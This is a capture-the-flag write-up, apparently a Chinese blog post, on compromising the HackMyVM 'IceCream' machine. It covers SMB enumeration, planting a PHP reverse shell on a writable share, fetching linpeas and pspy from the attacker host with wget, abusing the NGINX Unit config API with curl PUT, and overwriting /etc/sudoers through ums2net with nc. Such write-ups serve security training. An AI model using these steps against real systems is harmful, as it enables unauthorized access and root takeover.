hmv[-_-]IceCream

IceCream

image-20241009145709859

image-20241009151626781

信息搜集

端口扫描

┌──(kali💀kali)-[~/temp/IceCream]
└─$ rustscan -a $IP -- -sCV
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.10.101:22
Open 192.168.10.101:80
Open 192.168.10.101:139
Open 192.168.10.101:445
Open 192.168.10.101:9000

PORT     STATE SERVICE     REASON  VERSION
22/tcp   open  ssh         syn-ack OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 68:94:ca:2f:f7:62:45:56:a4:67:84:59:1b:fe:e9:bc (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOo0aMrFKUdos1+tMkValDaSFRx0lOy7VE4akDQlO9DGQDNT0aT5JCXm9jcgHk7mne7bxPG2jUBms8n2O1iQNyI=
|   256 3b:79:1a:21:81:af:75:c2:c1:2e:4e:f5:a3:9c:c9:e3 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPDdtb0wbP+/g4yk5RfteqQ3ho372gC6QdawREJ+y9Eb
80/tcp   open  http        syn-ack nginx 1.22.1
|_http-title: 403 Forbidden
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.22.1
139/tcp  open  netbios-ssn syn-ack Samba smbd 4.6.2
445/tcp  open  netbios-ssn syn-ack Samba smbd 4.6.2
9000/tcp open  cslistener? syn-ack
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Server: Unit/1.33.0
|     Date: Wed, 09 Oct 2024 07:17:15 GMT
|     Content-Type: application/json
|     Content-Length: 40
|     Connection: close
|     "error": "Value doesn't exist."
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Unit/1.33.0
|     Date: Wed, 09 Oct 2024 07:17:15 GMT
|     Content-Type: application/json
|     Content-Length: 1042
|     Connection: close
|     "certificates": {},
|     "js_modules": {},
|     "config": {
|     "listeners": {},
|     "routes": [],
|     "applications": {}
|     "status": {
|     "modules": {
|     "python": {
|     "version": "3.11.2",
|     "lib": "/usr/lib/unit/modules/python3.11.unit.so"
|     "php": {
|     "version": "8.2.18",
|     "lib": "/usr/lib/unit/modules/php.unit.so"
|     "perl": {
|     "version": "5.36.0",
|     "lib": "/usr/lib/unit/modules/perl.unit.so"
|     "ruby": {
|     "version": "3.1.2",
|     "lib": "/usr/lib/unit/modules/ruby.unit.so"
|     "java": {
|     "version": "17.0.11",
|     "lib": "/usr/lib/unit/modules/java17.unit.so"
|     "wasm": {
|     "version": "0.1",
|     "lib": "/usr/lib/unit/modules/wasm.unit.so"
|   HTTPOptions: 
|     HTTP/1.1 405 Method Not Allowed
|     Server: Unit/1.33.0
|     Date: Wed, 09 Oct 2024 07:17:15 GMT
|     Content-Type: application/json
|     Content-Length: 35
|     Connection: close
|_    "error": "Invalid method."
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9000-TCP:V=7.94SVN%I=7%D=10/9%Time=67062DF9%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,4A8,"HTTP/1\.1\x20200\x20OK\r\nServer:\x20Unit/1\.33\.0\r\n
SF:Date:\x20Wed,\x2009\x20Oct\x202024\x2007:17:15\x20GMT\r\nContent-Type:\
SF:x20application/json\r\nContent-Length:\x201042\r\nConnection:\x20close\
SF:r\n\r\n{\r\n\t\"certificates\":\x20{},\r\n\t\"js_modules\":\x20{},\r\n\
SF:t\"config\":\x20{\r\n\t\t\"listeners\":\x20{},\r\n\t\t\"routes\":\x20\[
SF:\],\r\n\t\t\"applications\":\x20{}\r\n\t},\r\n\r\n\t\"status\":\x20{\r\
SF:n\t\t\"modules\":\x20{\r\n\t\t\t\"python\":\x20{\r\n\t\t\t\t\"version\"
SF::\x20\"3\.11\.2\",\r\n\t\t\t\t\"lib\":\x20\"/usr/lib/unit/modules/pytho
SF:n3\.11\.unit\.so\"\r\n\t\t\t},\r\n\r\n\t\t\t\"php\":\x20{\r\n\t\t\t\t\"
SF:version\":\x20\"8\.2\.18\",\r\n\t\t\t\t\"lib\":\x20\"/usr/lib/unit/modu
SF:les/php\.unit\.so\"\r\n\t\t\t},\r\n\r\n\t\t\t\"perl\":\x20{\r\n\t\t\t\t
SF:\"version\":\x20\"5\.36\.0\",\r\n\t\t\t\t\"lib\":\x20\"/usr/lib/unit/mo
SF:dules/perl\.unit\.so\"\r\n\t\t\t},\r\n\r\n\t\t\t\"ruby\":\x20{\r\n\t\t\
SF:t\t\"version\":\x20\"3\.1\.2\",\r\n\t\t\t\t\"lib\":\x20\"/usr/lib/unit/
SF:modules/ruby\.unit\.so\"\r\n\t\t\t},\r\n\r\n\t\t\t\"java\":\x20{\r\n\t\
SF:t\t\t\"version\":\x20\"17\.0\.11\",\r\n\t\t\t\t\"lib\":\x20\"/usr/lib/u
SF:nit/modules/java17\.unit\.so\"\r\n\t\t\t},\r\n\r\n\t\t\t\"wasm\":\x20{\
SF:r\n\t\t\t\t\"version\":\x20\"0\.1\",\r\n\t\t\t\t\"lib\":\x20\"/usr/lib/
SF:unit/modules/wasm\.unit\.so\"\r\n\t\t\t},\r\n\r\n\t\t")%r(HTTPOptions,C
SF:7,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\nServer:\x20Unit/1\.3
SF:3\.0\r\nDate:\x20Wed,\x2009\x20Oct\x202024\x2007:17:15\x20GMT\r\nConten
SF:t-Type:\x20application/json\r\nContent-Length:\x2035\r\nConnection:\x20
SF:close\r\n\r\n{\r\n\t\"error\":\x20\"Invalid\x20method\.\"\r\n}\r\n")%r(
SF:FourOhFourRequest,C3,"HTTP/1\.1\x20404\x20Not\x20Found\r\nServer:\x20Un
SF:it/1\.33\.0\r\nDate:\x20Wed,\x2009\x20Oct\x202024\x2007:17:15\x20GMT\r\
SF:nContent-Type:\x20application/json\r\nContent-Length:\x2040\r\nConnecti
SF:on:\x20close\r\n\r\n{\r\n\t\"error\":\x20\"Value\x20doesn't\x20exist\.\
SF:"\r\n}\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-10-09T07:17:16
|_  start_date: N/A
|_clock-skew: 1s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 16534/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 30933/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 19523/udp): CLEAN (Failed to receive data)
|   Check 4 (port 16915/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| nbstat: NetBIOS name: ICECREAM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   ICECREAM<00>         Flags: <unique><active>
|   ICECREAM<03>         Flags: <unique><active>
|   ICECREAM<20>         Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00

目录扫描

┌──(kali💀kali)-[~/temp/IceCream]
└─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -b 301,401,403,404 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.10.101
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   301,401,403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 6988 / 441122 (1.58%)[ERROR] Get "http://192.168.10.101/sed.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 23352 / 441122 (5.29%)[ERROR] Get "http://192.168.10.101/Real_Estate": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.10.101/growth.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.10.101/2488": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 28289 / 441122 (6.41%)
[!] Keyboard interrupt detected, terminating.
Progress: 28323 / 441122 (6.42%)
===============================================================
Finished
===============================================================

漏洞发现

踩点

┌──(kali💀kali)-[~/temp/IceCream]
└─$ whatweb http://$IP                            
http://192.168.10.101 [403 Forbidden] Country[RESERVED][ZZ], HTTPServer[nginx/1.22.1], IP[192.168.10.101], Title[403 Forbidden], nginx[1.22.1]
┌──(kali💀kali)-[~/temp/IceCream]
└─$ curl http://192.168.10.101:9000/
{
        "certificates": {},
        "js_modules": {},
        "config": {
                "listeners": {},
                "routes": [],
                "applications": {}
        },

        "status": {
                "modules": {
                        "python": {
                                "version": "3.11.2",
                                "lib": "/usr/lib/unit/modules/python3.11.unit.so"
                        },

                        "php": {
                                "version": "8.2.18",
                                "lib": "/usr/lib/unit/modules/php.unit.so"
                        },

                        "perl": {
                                "version": "5.36.0",
                                "lib": "/usr/lib/unit/modules/perl.unit.so"
                        },

                        "ruby": {
                                "version": "3.1.2",
                                "lib": "/usr/lib/unit/modules/ruby.unit.so"
                        },

                        "java": {
                                "version": "17.0.11",
                                "lib": "/usr/lib/unit/modules/java17.unit.so"
                        },

                        "wasm": {
                                "version": "0.1",
                                "lib": "/usr/lib/unit/modules/wasm.unit.so"
                        },

                        "wasm-wasi-component": {
                                "version": "0.1",
                                "lib": "/usr/lib/unit/modules/wasm_wasi_component.unit.so"
                        }
                },

                "connections": {
                        "accepted": 0,
                        "active": 0,
                        "idle": 0,
                        "closed": 0
                },

                "requests": {
                        "total": 0
                },

                "applications": {}
        }
}

敏感端口测试

┌──(kali💀kali)-[~/temp/IceCream]
└─$ enum4linux -a $IP
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Oct  9 03:21:44 2024

 =========================================( Target Information )=========================================

Target ........... 192.168.10.101
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ===========================( Enumerating Workgroup/Domain on 192.168.10.101 )===========================

[+] Got domain/workgroup name: WORKGROUP

 ===============================( Nbtstat Information for 192.168.10.101 )===============================

Looking up status of 192.168.10.101
        ICECREAM        <00> -         B <ACTIVE>  Workstation Service
        ICECREAM        <03> -         B <ACTIVE>  Messenger Service
        ICECREAM        <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ==================================( Session Check on 192.168.10.101 )==================================

[+] Server 192.168.10.101 allows sessions using username '', password ''

 ===============================( Getting domain SID for 192.168.10.101 )===============================

Domain Name: WORKGROUP
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup

 ==================================( OS information on 192.168.10.101 )==================================

[E] Can't get OS info with smbclient

[+] Got OS info for 192.168.10.101 from srvinfo: 
        ICECREAM       Wk Sv PrQ Unx NT SNT Samba 4.17.12-Debian
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03

 ======================================( Users on 192.168.10.101 )======================================

Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.

Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.

 ================================( Share Enumeration on 192.168.10.101 )================================

smbXcli_negprot_smb1_done: No compatible protocol selected by server.

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        icecream        Disk      tmp Folder
        IPC$            IPC       IPC Service (Samba 4.17.12-Debian)
        nobody          Disk      Home Directories
Reconnecting with SMB1 for workgroup listing.
Protocol negotiation to server 192.168.10.101 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 192.168.10.101

//192.168.10.101/print$ Mapping: DENIED Listing: N/A Writing: N/A
//192.168.10.101/icecream       Mapping: OK Listing: OK Writing: N/A

[E] Can't understand response:

NT_STATUS_CONNECTION_REFUSED listing \*
//192.168.10.101/IPC$   Mapping: N/A Listing: N/A Writing: N/A
//192.168.10.101/nobody Mapping: DENIED Listing: N/A Writing: N/A

 ===========================( Password Policy Information for 192.168.10.101 )===========================

[+] Attaching to 192.168.10.101 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

        [+] ICECREAM
        [+] Builtin

[+] Password Info for Domain: ICECREAM

        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: 37 days 6 hours 21 minutes 
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes 
        [+] Locked Account Duration: 30 minutes 
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: 37 days 6 hours 21 minutes 

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5

 ======================================( Groups on 192.168.10.101 )======================================

[+] Getting builtin groups:

[+]  Getting builtin group memberships:

[+]  Getting local groups:

[+]  Getting local group memberships:

[+]  Getting domain groups:

[+]  Getting domain group memberships:

 =================( Users on 192.168.10.101 via RID cycling (RIDS: 500-550,1000-1050) )=================

[I] Found new SID: 
S-1-22-1

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[+] Enumerating users using SID S-1-5-21-780586060-1811573838-1416508090 and logon username '', password ''

S-1-5-21-780586060-1811573838-1416508090-501 ICECREAM\nobody (Local User)
S-1-5-21-780586060-1811573838-1416508090-513 ICECREAM\None (Domain Group)

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\ice (Local User)

 ==============================( Getting printer info for 192.168.10.101 )==============================

No printers returned.
┌──(kali💀kali)-[~/temp/IceCream]
└─$ smbmap -H $IP 

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                

[+] IP: 192.168.10.101:445      Name: lookup.hmv                Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        icecream                                                READ, WRITE     tmp Folder
        IPC$                                                    NO ACCESS       IPC Service (Samba 4.17.12-Debian)
        nobody                                                  NO ACCESS       Home Directories

都显示有一个可读写目录!前面的域名解析忘了删掉了。。。

┌──(kali💀kali)-[~/temp/IceCream]
└─$ nbtscan $IP                      
Doing NBT name scan for addresses from 192.168.10.101

IP address       NetBIOS Name     Server    User             MAC address      
------------------------------------------------------------------------------
192.168.10.101   ICECREAM         <server>  ICECREAM         00:00:00:00:00:00

以及9000端口的测试:

https://book.hacktricks.xyz/network-services-pentesting/9000-pentesting-fastcgi

以及 https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75

但是未果,查询一下,发现是:

image-20241009154507241

登录smb

登录以后尝试反弹shell!

┌──(kali💀kali)-[~/temp/IceCream]
└─$ vim revshell.php

┌──(kali💀kali)-[~/temp/IceCream]
└─$ ls -la
total 28
drwxr-xr-x   2 kali kali 4096 Oct  9 03:46 .
drwxr-xr-x 136 kali kali 4096 Oct  9 02:52 ..
-rw-r--r--   1 kali kali 8575 Oct  9 03:37 exp.py
-rwxr-xr-x   1 kali kali  492 Oct  9 03:35 exp.sh
-rw-r--r--   1 kali kali 3912 Oct  9 03:46 revshell.php

┌──(kali💀kali)-[~/temp/IceCream]
└─$ chmod +x revshell.php

┌──(kali💀kali)-[~/temp/IceCream]
└─$ smbclient //$IP/ICECREAM -U ICECREAM
Password for [WORKGROUP\ICECREAM]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Oct  9 03:39:01 2024
  ..                                  D        0  Sun Oct  6 06:06:38 2024
  systemd-private-04c229acaa5c413b8608357c75eae31f-systemd-logind.service-fuqSuC      D        0  Wed Oct  9 03:15:49 2024
  .font-unix                         DH        0  Wed Oct  9 03:15:48 2024
  systemd-private-04c229acaa5c413b8608357c75eae31f-systemd-timesyncd.service-UeLq7f      D        0  Wed Oct  9 03:15:48 2024
  .XIM-unix                          DH        0  Wed Oct  9 03:15:48 2024
  .ICE-unix                          DH        0  Wed Oct  9 03:15:48 2024
  .X11-unix                          DH        0  Wed Oct  9 03:15:48 2024

                19480400 blocks of size 1024. 16156948 blocks available
smb: \> pwd
Current directory is \\192.168.10.101\ICECREAM\
smb: \> help
?              allinfo        altname        archive        backup         
blocksize      cancel         case_sensitive cd             chmod          
chown          close          del            deltree        dir            
du             echo           exit           get            getfacl        
geteas         hardlink       help           history        iosize         
lcd            link           lock           lowercase      ls             
l              mask           md             mget           mkdir          
more           mput           newer          notify         open           
posix          posix_encrypt  posix_open     posix_mkdir    posix_rmdir    
posix_unlink   posix_whoami   print          prompt         put            
pwd            q              queue          quit           readlink       
rd             recurse        reget          rename         reput          
rm             rmdir          showacls       setea          setmode        
scopy          stat           symlink        tar            tarmode        
timeout        translate      unlock         volume         vuid           
wdel           logon          listconnect    showconnect    tcon           
tdis           tid            utimes         logoff         ..             
!              
smb: \> put revshell.php 
putting file revshell.php as \revshell.php (764.0 kb/s) (average 764.1 kb/s)
smb: \> ls
  .                                   D        0  Wed Oct  9 03:47:43 2024
  ..                                  D        0  Sun Oct  6 06:06:38 2024
  systemd-private-04c229acaa5c413b8608357c75eae31f-systemd-logind.service-fuqSuC      D        0  Wed Oct  9 03:15:49 2024
  .font-unix                         DH        0  Wed Oct  9 03:15:48 2024
  systemd-private-04c229acaa5c413b8608357c75eae31f-systemd-timesyncd.service-UeLq7f      D        0  Wed Oct  9 03:15:48 2024
  .XIM-unix                          DH        0  Wed Oct  9 03:15:48 2024
  .ICE-unix                          DH        0  Wed Oct  9 03:15:48 2024
  .X11-unix                          DH        0  Wed Oct  9 03:15:48 2024
  revshell.php                        A     3912  Wed Oct  9 03:47:43 2024

                19480400 blocks of size 1024. 16156944 blocks available

然后访问激活一下即可!

http://192.168.10.101/revshell.php

image-20241009161459668

提权

信息搜集

(remote) www-data@icecream:/$ cd /var/tmp
(remote) www-data@icecream:/var/tmp$ wget http://192.168.10.102:8888/linpeas.sh
(remote) www-data@icecream:/var/tmp$ wget http://192.168.10.102:8888/pspy64
(remote) www-data@icecream:/var/tmp$ chmod +x *

看一下有啥信息:

image-20241009164141742

image-20241009164246571

image-20241009164308129

image-20241009161930352

image-20241009162128630

添加路由监听提权ice

Todd师傅找到了一个加路由的办法!尝试按图索骥一下!

image-20241009171301922

发现存在使用PUT进行更新的办法:

image-20241213101716225

根据官网下面的样例,尝试创建一个配置文件上传:

{
    "listeners": {
        "127.0.0.1:8080": {
            "pass": "routes"
        }
    },

    "routes": [
        {
            "action": {
                "share": "/tmp/revshell.php",
                "pass": "applications/shellapp"
            }
        }
    ],
    "applications": {
    "shellapp": {
      "type": "php",
      "user": "/tmp",
      "index": "revshell.php",
      "script": "revshell.php"
    }
  }
}

然后报错了。。。

image-20241213105904745

现尝试使用之前的权限,调整了一下,先使用之前的权限写入的shell,再传配置文件:

image-20241213110615527

{
    "listeners": {
        "127.0.0.1:8080": {
            "pass": "routes"
        }
    },

    "routes": [
        {
            "action": {
                "pass": "applications/shellapp"
            }
        }
    ],
    "applications": {
    "shellapp": {
      "type": "php",
      "user": "/tmp",
      "index": "revshell.php",
      "script": "revshell.php"
    }
  }
}

然后:

┌──(kali💀kali)-[~/temp/IceCream]
└─$ curl -X PUT --data-binary @shell.json http://192.168.10.102:9000/config
{
        "error": "Invalid configuration.",
        "detail": "Required parameter \"root\" is missing."
}

再次修改:

{
    "listeners": {
        "127.0.0.1:8080": {
            "pass": "routes"
        }
    },

    "routes": [
        {
            "action": {
                "pass": "applications/shellapp"
            }
        }
    ],
    "applications": {
    "shellapp": {
      "type": "php",
      "root": "/tmp",
      "index": "revshell.php",
      "script": "revshell.php"
    }
  }
}
┌──(kali💀kali)-[~/temp/IceCream]
└─$ curl -X PUT --data-binary @shell.json http://192.168.10.102:9000/config
{
        "success": "Reconfiguration done."
}

然后无法访问,重启,重新上传shell,调整了一下,拿下user:

image-20241213111715680

image-20241213111745358

提权root

image-20241213112008892

查看一下这是啥:

USB Mass Storage to Network Proxy (ums2net)

ums2net provides a way for a user to connect from a network connection to a USB mass storage device.

Build

  1. cmake .
  2. make

How to use ums2net

  1. Insert the USB Mass Storage. Check /dev/disk/by-id/ for the unique path for that device.
  2. Create a config file base on the above path. Please see the config file format section.
  3. Run "ums2net -c ". ums2net will become a daemon in the background. For debugging please add "-d" option to avoid detach.
  4. Use nc to write your image to the USB Mass Storage device. For example, "nc -N localhost 29543 < warp7.img"

Config file

Each line in the config file maps a TCP port to a device. All the options are separated by space. The first argument is a number represents the TCP port. And the rest of the arguments are in dd-style. For example,

A line in the config file:

"29543 of=/dev/disk/by-id/usb-Linux_UMS_disk_0_WaRP7-0x2c98b953000003b5-0:0 bs=4096"

It means TCP port 29543 is mapped to /dev/disk/by-id/usb-Linux_UMS_disk_0_WaRP7-0x2c98b953000003b5-0:0 and the block size is 4096.

Currently we only support "of" and "bs".

写的是USB通过tcp共享数据,尝试反过来进行修改一下sudoers文件:

echo "1234 of=/etc/sudoers bs=4096" > config
sudo /usr/sbin/ums2net -c config -d

然后本地通过nc传过去就行了:

echo 'ice ALL=(ALL) NOPASSWD: ALL' |nc $IP 1234

image-20241213113021298

拿下root。

参考

https://blog.findtodd.com/2024/10/09/hmv-Icecream

https://medium.com/@josemlwdf/icecream-bca574cf4a44

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇